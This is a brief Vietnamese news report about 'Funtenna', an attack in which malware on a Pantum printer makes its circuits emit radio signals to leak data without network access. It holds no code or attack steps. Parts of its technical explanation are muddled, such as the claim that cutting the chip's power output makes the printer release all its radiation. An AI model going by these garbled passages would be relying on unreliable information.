Mới đây, tin tặc đã cấy phần mềm độc hại vào một chiếc máy in laser thương hiệu Pantum và kiểm soát quyền điều khiển các mạch (mạch đầu vào/đầu ra) và rung chúng ở một tần số (mà truyền tín hiệu radio) theo lệnh của kẻ tấn công và biến thiết bị trở nên vô tác dụng bằng cách ngắt toàn bộ nguồn năng lượng đầu ra của chip điều khiển, từ đó chiếc máy in này xả ra toàn bức xạ điện từ. Các chuyên gia bảo mật gọi đây là  "funtenna." .  Đây là một thuật ngữ dùng để miêu tả cách tấn công mới của tin tặc có sử dụng âm thanh và sóng vô tuyến để thu thập dữ liệu từ máy tính mà không cần truy cập Internet.

Mặc dù, nhiều thiết bị được thiết lập mạng lưới phát hiện virus, tường lửa… nhưng phương thức tấn công và đánh cắp dữ liệu theo cách mới này thì hiện trên thế giới vẫn chưa có biện pháp ngăn chặn triệt để. Đây cũng là nhiệm vụ mới mà các chuyên gia an ninh mạng phải triển khai trong thời gian tới. Điều nguy hiểm ở đây là các thiết bị đang trong vòng tấn công của tin tặc tự động trở thành những máy phát, truyền dữ liệu. Vì vậy, kỹ thuật Funtenna mới vượt qua tất cả các phương pháp bảo mật mạng thông thường và sử dụng một kỹ thuật gọi là “phần cứng agnostic” có sẵn để hoạt động với tất cả hệ thống máy tính hiện đại và các thiết bị sử dụng phần mềm nhúng.

Theo XHTN